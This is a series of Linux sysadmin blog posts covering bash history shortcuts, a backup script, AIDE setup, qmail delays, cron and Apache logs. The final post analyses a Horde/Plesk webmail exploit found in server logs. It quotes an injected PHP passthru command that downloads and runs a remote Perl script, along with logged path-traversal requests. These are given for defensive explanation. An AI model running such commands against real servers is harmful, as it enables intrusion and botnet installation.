Linux: Execute previous command and replace program name

Sometimes you execute a command and need to execute it again by changing the program called e.g.

cat /etc/hosts
vi /etc/hosts

Of course you can just use the arrow up to get back to the previous line, press CTRL-A to get to the beginning of the line, delete three characters and right vi instead of cat. But there is a better way to do it. You can just execute the previous command and use a search and replace:

cat /etc/hosts
!!:s/cat/vi

It will replace cat by vi and execute the following:

vi /etc/hosts

You can do the same thing by executing the following:

^cat^vi

If all you replace is the command used, you can also do it this way:

vi !!:*

It will execute vi with all arguments used for the previous command.

If what you’re after is only the last argument of the previous command, you can also use the Alt-. keyboard shortcut. This will take the last argument of the previous command and print it to the command line. So you can write vi and press Alt-. (Alt-Dot) and you will get “vi /etc/hosts”. If you had the following in the previous command:

cat /etc/hosts /etc/hosts.allow

You’d get:

vi /etc/hosts.allow

All this is also useful if you typed a long command line and misspelled something e.g. cta instead of cat.

Linux: Simple incremental backup script

This is a simple script to perform an incremental backup of a directory. It will create a backup folder and in this folder it will create subfolders with a timestamp as name. Every file modified since the last backup will be copied (preserving directories, permissions, owner and timestamp). The first time you execute the script, it will just copy all files.

The root for the backup is defined with an environment variable called BACKUP_ROOT. You can set it with the export command:

export BACKUP_ROOT=/mybackup

If it is not set, /tmp/backup will be used as default (but you can change the default in the script itself).

#!/bin/sh

# Check number of parameters
if [ -z "$1" ]
  then
    echo "Usage: $0 <path_to_dir_to_backup>"
    exit 1
fi

# Check whether directory to backup exists
if [[ ! -d "$1" ]];
  then
    echo "$1 does not exist or is not a directory"
    exit 1
fi

# Use /tmp/backup als default if no backup root is defined
[ -z "$BACKUP_ROOT" ] && BACKUP_ROOT=/tmp/backup

# Create backup root directory if it doesn't exist
[ -d $BACKUP_ROOT ] || mkdir $BACKUP_ROOT

# Move last backup timestamp
[ -f $BACKUP_ROOT/.new_backup ] && mv $BACKUP_ROOT/.new_backup $BACKUP_ROOT/.last_backup

# Create new backup timestamp
touch $BACKUP_ROOT/.new_backup

# Generate a new backup folder name
TIME=$(date '+%Y%m%d%H%M%S')
BACKUP_FOLDER=$BACKUP_ROOT/$TIME

# Create the new backup folder
mkdir $BACKUP_FOLDER

# If there was a previous backup, backup only newer files recreating parent paths and preserving permissions, owner and timestamp
# Or backup all files if it is the first backup
[ -f $BACKUP_ROOT/.last_backup ] && find $1 -type f -newer $BACKUP_ROOT/.last_backup -exec cp -p --parents {} $BACKUP_FOLDER/ \; || find $1 -type f -exec cp -p --parents {} $BACKUP_FOLDER/ \;

I guess there are enough comments in there so that I do not need to go into details about how the script works but feel free to drop a comment in case you have a question.

Linux: keep track of command execution and its output

Just a short post about how you can keep track of the which commands you have executed as well as there output. This is especially useful when you want to document how you performed some task or solved some problem. So it’s a great tool when you write blog posts about such things !

All you have to do is call the script command and provide a path to a file where the output will be logged e.g.:

script /tmp/script.log

From now on, everything will be logged. To stop logging, just type:

exit

The ouput in the file basically looks the output on the terminal but you do not need to worry about the window buffer, about the terminal crashing or you forgetting to copy the contents of the terminal window before closing. An additional benefit of the script command is that it also saves colored output, so if you executed the following:

ls -l --color=always /usr

you would see a colored output when using cat to output the contents of the file:

cat /tmp/script.log

Of course when using it to write blog posts, one thing which is still missing are changes to files done using vi or nano. But I haven’t yet found a tool for this. One solution would be to have a script calling vi or nano and first saving a copy of the file and making a diff once you exit the editor…

Linux: Configure AIDE (Advanced Intrusion Detection Environment)

We upgraded our server to Debian Wheezy and Plesk 11.5 about a week ago and started getting many emails from cron. Luckily I had entered the email address of a colleague as administrator and he got the spam 😉

One of them was this one:

———- Forwarded message ———-
From:
Date: 2013/9/16
Subject: Daily AIDE report for xx-xxxx.myserver.de
To: root@xx-xxxx.myserver.de

This is an automated report generated by the Advanced Intrusion Detection
Environment on xx-xxxx.myserver.de started at 2013-09-16 07:45:17.

******************************************************************************
* The cron job was terminated by a fatal error. *
******************************************************************************

******************************************************************************
* the cron job was interrupted before AIDE could return an exit code. *
******************************************************************************
******************************************************************************
* script errors *
******************************************************************************
Fatal error: The AIDE database ‘/var/lib/aide/aide.db’ does not exist!
This may mean you haven’t created it, or it may mean that someone has removed it.
End of script errors

AIDE produced no errors.

funny, AIDE did not leave a log.

End of AIDE daily cron job at 2013-09-16 07:45, run time 0 seconds

I didn’t know we had AIDE installed but since it was there, it’d make sense to initialize it properly and see whether it works fine. For those of you who do not know AIDE: it is an intrusion detection software which works by checking file and directory integrity. In order to work, AIDE needs to first have a database it can use to then detect changes.

So the first step is to initialize the database. I found a nice article at HowToForge. It looked pretty easy to I started with the first step which was to download a sample configuration file:

wget securehostingdirectory.com/aide.conf

And I got a 404 error:

–2013-09-16 20:32:46– http://securehostingdirectory.com/aide.conf
Resolving securehostingdirectory.com (securehostingdirectory.com)… 69.65.27.131
Connecting to securehostingdirectory.com (securehostingdirectory.com)|69.65.27.131|:80… connected.
HTTP request sent, awaiting response… 404 Not Found
2013-09-16 20:32:47 ERROR 404: Not Found.

Well… it starts fine… So I checked in Google whether I could find any alternative location but couldn’t find any. Then I thought that there must be some kind of configuration already available since it was looking for the database at a specific path. So I checked the cron job sending us this nice email:

# grep "aide.conf" /etc/cron.daily/aide
CONFFILE="/var/lib/aide/aide.conf.autogenerated"
# grep aide configuration data from aide config
update-aide.conf

Then opened /var/lib/aide/aide.conf.autogenerated to check the content and saw the following:

#########
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# this file is generated dynamically from /etc/aide/aide.conf and the files
# in /etc/aide/aide.conf.d
# Any changes you make here will be lost.
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
# WARNING WARNING WARNING
#########

aide.conf as well as /etc/aide/aide.conf.d were there and it looks like they were used to generate this file. So I just needed to create the databse. So I just skipped the wget part of the tutorial and went to the next step (Step 2: Initialize the AIDE database):

# nice -19 aide --init --config=/etc/aide/aide.conf

AIDE, version 0.15.1

### AIDE database at /var/lib/aide/aide.db.new initialized.

It was pretty fast (you wish AIDE was actually that fast to initialize…). Then I checked whether AIDE was working properly:

 nice -19 aide -C --config=/etc/aide/aide.conf
Couldn't open file /var/lib/aide/aide.db for reading

Ok, this one is obvious, it has created a aide.db.new file and is actually looking for aide.db so I just had to rename the file (well, I thought so because the next step of the tutorial was “cp aide.db.out aide.db.in”):

# mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db
# nice -19 aide -C --config=/etc/aide/aide.conf
Database does not have attr field.
Comparation may be incorrect
Generating attr-field from dbspec
It might be a good Idea to regenerate databases. Sorry.
db_char2line():Error while reading database

OK, so the initialization was actually too fast and it didn’t generate a proper database… So after googling again, I found out you can initialize AIDE with the following:

aideinit

It then runs forever using a CPU core at about 80% to 100%. It might display a few warnings like:

/run/lock/mailman/master-qrunner.xx-xxxx.myserver.de.8246 mtime in future
/run/lock/mailman/master-qrunner mtime in future

But I wouldn’t worry about them.

Looking at the running processes, I can see that it actually caused a aide — init to be called but with the auto generated configuration file. Actually I should have thought that it is the one I should use, otherwise all rules are missing…

The initialization of AIDE took over an hour. I then made the second mistake: I immediately run a check, got the same error, assumed that the created database was again not working and restarted an initialization. Only later did I think that the problem was probably that it created a aide.db.new database and I needed to copy it to aide.db otherwise the check would still run with the old database.

After the second initialization and copying the file, I didn’t get the same error again when running the check but a new one:

/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated -C
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
...

The message is not 100% clear (does it mean it expected one and found none or that it expected one and found two ?). I thought it might have something to do with the second initialization. Maybe it did not reset the file but just appended to it… So I deleted both db files and tried again:

rm /var/lib/aide/aide.db.new /var/lib/aide/aide.db
aideinit
cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db
/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated --checked

It then looked better and I actually got a list of differences. I now need to check the list and also check what I need to add to the exclusion list and other configuration option to try to keep everything secure but avoid unnecessary spamming.

Optimize images on Linux and Mac

Most website have many images. You might not be aware of it but it does. I mostly have text and code in my posts and thought I do not need to care too much about optimizing the images in there because there are rarely any. But the fact is that even though my posts mostly do not contain images, the theme I use as well as a few plugins do use images.

If you are using WordPress, you can easily optimize (and compress) images in your post using a plugin. I’ve used WP Smush.it and EWWW Image Optimizer. First I used WP Smuch.it but at some point in time it stopped working so I switched to EWWW Image Optimizer. But when WP Smush.it got fixed I switched back since I felt more confortable with it.

But these plugins only optimize images in the media library. Not images part of themes or plugins. Since most images on my site fall under this category, I had to find a solution. I didn’t find a plugin for this but two nice command line tools.

Why two ? Well because one of them takes care of PNG files and the other one takes care of JPEG files.

First, the PNG files. I optimize them using a command line tool call optipng. You can install it like this under Linux:

apt-get install optipng

(note that you might need to add a sudo before the apt-get)

On Mac, using Homebrew:

brew install optipng

To use the tool, you just need to provide a file to optimize:

optipng myfile.png

If you need to optimize all images in a given folder:

find . -iname "*.png" -exec optipng {} \;

If you want an even better optimization and can leave with a very long optimization duration, add the -o7 Option:

find . -iname "*.png" -exec optipng -o7 {} \;

Now, the JPEG files. For this I used a command line tool called jpegoptim.

Installation under Linux:

apt-get install jpegoptim

On Mac with Hombrew:

brew install jpegoptim

And just provide a file to optimize:

jpegoptim myfile.jpg

For a bulk optimization:

find . -iregex ".*\.jpe?g" -exec jpegoptim {} \;

This performs a lossless optimization (this means the pixels you’ll see are still the same but the file is smaller). Without loss of quality you can still get smaller file but if you can live with a lower image quality, you can achieve a better optimization:

find . -iregex ".*\.jpe?g" -exec jpegoptim --max=75 {} \;

This means you are ready to loose up to 25% quality in order to get smaller files.

Note that you can also optimize images online using Smush.it.

Also remember if you use WordPress that images in plugins and themes will be overwritten by every update of the plugin or theme. So run these two tools once in a while (at least after updating multiple plugins and themes).

Qmail: 30 to 60 seconds connection delay

I’ve noticed that when connection to port 25 of one of our servers, it took quite a long time until commands can be sent. To test it, zou connect using telnet>

telnet xxx.xxx.xxx.xxx 25

Where xxx.xxx.xxx.xxx is the IP address of the server on which the mail server is running.

I saw that the connection was immediately established but it took quite some time for the server to send a 220 response. Before this response is received no commands (e.g. HELO, QUIT…) can be processed. Here’s the sequence in which things happen:

  1. Client attempts to open an SMTP connection to port 25 of the server.
  2. Client waits for the socket connection to be established.
  3. Connection established.
  4. Client waits for protocol to start (i.e. waits for a 220 message).
  5. Server sends a 220 code saying it is ready for action.
  6. Now the client can send commands to the server.

The delay occurs in step 4. It takes a long time until the server sends a 220 code.

What happens in the background is that the server validates that the client is trustworthy. This involves performing a reverse lookup of the IP address and checking for known spammers. This can take some time especially if the reverse lookup results in a timeout.

Here are a few things you need to do to get rid of this timeout:

First, make sure that the name servers that are listed in /etc/resolv.conf are working properly.

You can check whether the IP from where the client is accessing the server can be reverse resolved. You can check it with:

# host 192.168.1.1
Host 1.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

If you get a “not found” as shown above then it means the name resolution will not work. You might also get the following:

# host 192.168.1.1
;; connection timed out; no servers could be reached

In this case, the reverse lookup times out. You can prevent the qmail from performing a reverse lookup by changing the xinetd script used to start qmail. The script is located in /etc/xinetd.d. It’s usually called smtp or smtp_psa if you’re using Plesk. It looks like this:

service smtp
{
       socket_type     = stream
       protocol        = tcp
       wait            = no
       disable         = no
       user            = root
       instances       = UNLIMITED
       server          = /var/qmail/bin/tcp-env
       server_args     = /usr/sbin/rblsmtpd  -r sbl-xbl.spamhaus.org /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

tcp-env supports the following options:

-r (Default.) Attempt to obtain TCPREMOTEINFO from the
remote host.

-R Do not attempt to obtain TCPREMOTEINFO from the remote
host.

-t
Give up on the TCPREMOTEINFO connection attempt after
timeout seconds. Default: 30.

So we need to use the -R option and could also set the timeout to 0 seconds with the -t0 option:

service smtp
{
       socket_type     = stream
       protocol        = tcp
       wait            = no
       disable         = no
       user            = root
       instances       = UNLIMITED
       server          = /var/qmail/bin/tcp-env
       server_args     = -Rt0 /usr/sbin/rblsmtpd  -r sbl-xbl.spamhaus.org /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

Actually -t0 is redundant when using -R. So you can try with -R and with -Rt0 and see whether it makes any difference on your system.

After changing this, you’ll need to restart xinetd:

/etc/init.d/xinetd restart

If you use inet instead of xinetd then you need to update /etc/inetd.conf instead and restart inetd by using:

/etc/init.d/inetd restart

or:

killall -HUP inetd

Please note that Plesk seems to overwrite this file once in a while. So you might loose this setting.

Even after setting this, I’ve seen that from most servers the delay was gone but I still had a remaining 30 seconds delay when connection to the mail server from my laptop.

The mail server uses to auth protocol to contact the client machine. Unfortunately, many firewalls are configured to just ignore these requests without answering. In this case, you’ll also have to wait for a timeout to occur before the mail server goes to the next step.

In order to get rid of it, you can configure a rule using iptables to actively reject connections from the server to a remote port 113 so that you do not have to wait for 30 seconds in case the remote firewall just silently ignores your request. The processing of the request on port 113 is not critical for the functioning of the mail server, it’s safe to prevent it. Execute the following on the server to have these connection rejected by the local firewall on the server:

iptables -A OUTPUT -p TCP --dport 113 -j REJECT --reject-with tcp-reset

Making these few changes made sure that the connection from our other servers was done without delays. And from my laptop I do not get a fix 60 seconds or 30 seconds delay anymore but it’s mostly taking between 1 and 15 seconds.

If after doing all this, it’s still slow, you should check the list of servers used by rblsmtpd. rblsmtpd blocks mail from RBL-listed sites. It uses a list of sources. In my case only sbl-xbl.spamhaus.org. First make sure that all source are still up and running, since this could also cause an additional timeout (the default timeout is 60 seconds). Additionally, checking whether the client is blacklisted also costs time. So you might want to remove rblstmpd and its parameters (basically what’s between -Rt0 and /var/qmail/bin/relaylock above and see whether it’s faster.

Linux: Test crontab

Let’s assume you’ve setup a cron job in crontab and it doesn’t seem to be fired or not to do what you’d expect it to do.

There are a few things you should check:

  1. Is the cron job properly installed?
  2. Is cron working?
  3. Is the configured command working?
  4. Can cron run the configured command?

Is the cron job properly installed?

List crontabs

The first step is to check whether your cron job is at all installed. You will find useful commands in this previous post.

Check the time definition of the cron job

One issue could be that the time definition of the cron job is not valid or doesn’t trigger the cron job at the time interval you’d expect it to run. Checking this is pretty easy using the CRON tester. Just paste the time definition part in there and press “Test”. It will show you the date and time of the next 10 executions of the job.

If you e.g. paste the following: 1 2 3 * *
You’ll get the following output:

Given the CRON job starting at 2013-07-30 11:30:57 (now), it would run:

    2013-08-03 02:01:00
    2013-09-03 02:01:00
    2013-10-03 02:01:00
    2013-11-03 02:01:00
    2013-12-03 02:01:00
    2014-01-03 02:01:00
    2014-02-03 02:01:00
    2014-03-03 02:01:00
    2014-04-03 02:01:00
    2014-05-03 02:01:00

Is cron working?

The first thing you should do is to check the log files:

grep cron /var/log/messages

The results should look like this:

Jul 29 23:38:01 xxxxxx /usr/sbin/cron[16170]: (root) CMD (/bin/echo "hello" >> /tmp/test.log)

First the date and time of execution, the the hostname, the the path to cron and the process ID of the cron child process, then the user and after CMD the command executed.

If you issued a crontab with the -l option you will also see such entries:

Jul 29 23:43:45 xxxxxx crontab[21081]: (root) LIST (root)

If you do not see anything in there, cron is probably not running properly…

In order to check whether cron is working, the easiest way is to install a cron job running every minute and giving you some kind of output i.e. either writing a string in a file or displaying a string on open terminals.

Write a string in a file

Install the following cron job (I assume you know how to install it, otherwise you’ll probably not have read this far…):

* * * * * /bin/echo "hello" >> /tmp/test.log

This will cause the job to run every minute and will write “hello” to the specified file. Make sure that the user has access to this file. Feel free to place the file somewhere else if required.

Then just sit and relax for a few minutes. After that you should see that the file contains “hello” a few times. This means cron is running and you can just remove this new cron job.

Display a string on open terminals

This can be done using the wall command. This command takes a file as parameter and prints the contents of this file to all open terminals. Alternatively, if no file is specified, it will print the standard input to all terminals. That’s the way we’ll do it. We’ll echo a string and redirect it to wall:

* * * * * /bin/echo "hello" | /usr/bin/wall

You should then see the following displayed every minute:

Broadcast Message from root@xxxxxx
        (/dev/pts/0) at 11:38 ...

hello

Before installing it, please first check the location of wall on your system (on mine it is in /usr/bin):

# which wall
/usr/bin/wall

If it works, you can just remove the new cron job.

Is the configured command working?

To check whether the command is working properly, you can just execute it from a shell. Of course the user and the environment might be different. In order to really test the script in a real cron environment, please refer to this previous post.

Can cron run the configured command?

If cron can run the configured command, you should first be able to see in /var/log/messages that it is being executed. If it is the case and you still do not get the expected results, you should check the rights on the script or executable being called.

Also a good way to find out what happens is to redirect the output of the called command to some file e.g.:

0 0 * * * /home/user/bin/myscript.sh >> /home/logs/mylog.log 2>&1

This will cause all output of the script to be redirected to the specified file. If you happen to call this command manually with a different user, please keep in mind that the permissions of the log file will be wrong (belonging to the wrong user) and after that the cron job might not be able to write to this file. If it is the case, you should just delete the log file created in the manual test or update its permissions.

Linux: Apache logs

Location

The Apache Web Server log files contains all errors found while serving requests as well as records of all incoming requests. The location of the log files is configurable. By default they are stored in one of these directories depending on the Linux distribution:

  • /var/log/httpd
  • /var/log/apache2
  • sometimes directly in /var/log
  • /usr/local/apache/log

The exact location of the log files is configured in the apache2.conf or httpd.conf log file. Here’s where you should look for it:

  • /etc/apache2/httpd.conf
  • /usr/local/etc/apache2/httpd.conf
  • /etc/httpd/conf/httpd.conf

To find the location of the error log file, open the apache configuration file and search for ErrorLog. Alternatively you can use grep to get the information without having to open the file in an editor:

# grep ^ErrorLog /etc/apache2/httpd.conf
ErrorLog /var/log/apache2/error_log

Replace /etc/apache2/httpd.conf by the actual location of the apache configuration file.

The access log file containing the records of all incoming requests, is usually stored at the same location. To get its name, you usually just have to replace error by access in the path to the error log file.

You can also get the actual location of the access log file using grep:

# grep ^CustomLog /etc/apache2/httpd.conf
CustomLog /var/log/apache2/access_log combined

Format

The “combined” after the log file path means that the “combined” log format should be used. The other log format you can use is the “common” log format. Both of them are pretty similar. The common log format will store the following information on each line:

  • IP address of the client
  • identity of the client
  • user ID
  • time that the server finished processing the request
  • method used (e.g. GET) and requested resource
  • status code sent back to the client
  • size of the object returned to the client

Additionally, the combined log format will also store the following information:

  • site the client has been referred from
  • User-Agent

Graceful restart

A graceful restart will instruct the web server to reopen the log files for new requests. When you rename the log files, apache will continue writing to the renamed log files. By performing a graceful restart of apache, you will cause apache to reopen the log files at the configured path and write to the new files for new requests. Requests being processed at the time of the graceful restart will be logged to the renamed file. So after a graceful restart, you will need wait for all pending requests to be finally processed before you can work on the renamed logfiles (e.g. compress them).

Here a short example:

mv /var/log/apache2/access_log /var/log/apache2/access_log.save
mv /var/log/apache2/error_log /var/log/apache2/error_log.save
/usr/sbin/apache2ctl -k graceful

The pending requests will be logged to access_log.save and error_log.save and new requests to access_log and error_log.

Note that instead of /usr/sbin/apache2ctl you might have to use one of the following:

  • /usr/sbin/apachectl
  • /usr/sbin/httpd2
  • /usr/local/apache2/bin/apachectl

Also if it complains that the arguments are not fine try executing it without the -k i.e. only with graceful as command line argument.

Log rotation

Using a graceful restart, you can manually rotate logs (or rotate them with a cron job) but there’s an even nicer solution. You can used piped logs. Piped logs just mean that the web server will write log files through a pipe to another process instead of directly to the files. Like this you can basically redirect the log files to rotatelogs which will create new log files on a regular basis.

Instead of:

CustomLog /var/log/apache2/access_log combined

configure the following:

CustomLog "|/usr/sbin/rotatelogs2 /var/log/apache2/access_log 86400" combined

86400 is the number of seconds after which the log file should be rotated (in this case 24 hours).

Instead of /usr/sbin/rotatelogs2 you might have to use one of the following paths:

  • /usr/sbin/rotatelogs
  • /usr/local/apache/bin/rotatelogs
  • /usr/local/sbin/rotatelog

Other log files

There are also other log files created by the apache log server or its modules. They are usually stored in the same location as the error and access logs. Some of them are:

  • ScriptLog: log for mod_rewrite, input to and output from CGI scripts
  • RewriteLog: log for mod_rewrite, rewrite transforms requests
  • JkLogFile : log for mod_jk, communication between Tomcat and Apache

jmap: Could not reserve enough space for object heap

If you get the following error message when using jmap to get a Java heap dump:

# $JAVA_HOME/bin/jmap -dump:file=/tmp/dump.hprof PID
Error occurred during initialization of VM
Could not reserve enough space for object heap
Could not create the Java virtual machine.

it’s due to the default heap size used in the server VM so you just need to set some values for the Xmx and Xms parameters. With jmap you also need to prefix it with a -J meaning that this parameter will be transferred to the underlying JVM:

 # $JAVA_HOME/bin/jmap -F -J-Xms16m -J-Xmx128m -dump:file=/tmp/dump.hprof 24613
Attaching to process ID 24613, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 20.4-b02
Dumping heap to /tmp/dump.hprof ...
Finding object size using Printezis bits and skipping over...
...
Finding object size using Printezis bits and skipping over...
Heap dump file created

If you create multiple files, it makes sense to have a timestamp in the filename e.g.:

 # $JAVA_HOME/bin/jmap -F -J-Xms16m -J-Xmx128m -dump:file=/tmp/dump.`date '+%Y%m%d%H%M%S'`.hprof 24613

Plesk Exploit: Readable Logfile Vulnerability

A vulnerability scan has been performed on one of our servers at the beginning of the month. This last about 4 days. It was looking for a vulnerable versions of the Plesk control panel to exploit the Horde/IMP Plesk Webmail Exploit. Let’s have a look at how this looks like in a few log files:

First the attacker is checking which version of Horde is installed:

access_log:xx.xxx.xx.xxx - - [01/Jun/2013:15:05:42 +0200] "GET /horde/services/help/?show=about HTTP/1.1" 200 3326 "-" "HTTP_Request2/0.5.2 (http://pear.php.net/package/http_request2) PHP/5.2.11"

If it finds a suitable version of Horde, it will go to the next steps:

access_log:xx.xxx.xx.xxx - - [01/Jun/2013:15:38:39 +0200] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

Here, the attacker sends a POST request to /horde/imp/redirect.php including some PHP code as the username. It usually uses the passthru PHP function which executes an external programm. The PHP code usually looks like this:

passthru('cd /tmp;wget http://xxx/yyy.txt;perl yyy.txt;rm -f yyy.txt');

It basically always does the the same:

  1. Go to the tmp directory
  2. Download a PERL script
  3. Execute the script
  4. Delete the script

There are a few variations:

  • The commands are executed using passthru, system, shell_exec or exec
  • The script is downloaded using wget, curl, fetch, GET, lwp-download or lynx
  • The downloaded file is a file with the .txt extension or has an image file extension and is renamed before being executed
  • Sometimes, the attacker also messes with the history so that you do not see what exactly happened

There are even scripts used which will use many of the combinations above just in case some of them do not work on this particular system.

This PHP code is written to the horde log file. It is then executed by using a vulnerability of barcode.php (or rather a vulnerability in Image.php which is called by barcode.php). This looks like this:

access_log:xx.xxx.xx.xxx - - [04/Jun/2013:15:38:41 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

It will most probably also try different log file locations e.g.:

access_log:xx.xxx.xx.xxx - - [04/Jun/2013:15:38:40 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"

In many cases, the perl scripts will just install some additional PERL scripts used for DDOS attacks in your /var/www/vhost/xxx/cgi-bin directories. You can find such scripts using:

find /var/www/vhosts/[a-z]*/cgi-bin/*.pl

In order to protect your system, you should always install all Plesk security updates. This vulnerability is very old but seems to be still worth exploiting. There is also a fix for Image.php which can be downloaded here.

Note that the PERL scripts stored in your vhost folders are often well commented and you will find such comments in there:

#part of the Gootkit ddos system

Nice, isn’t it ? 😉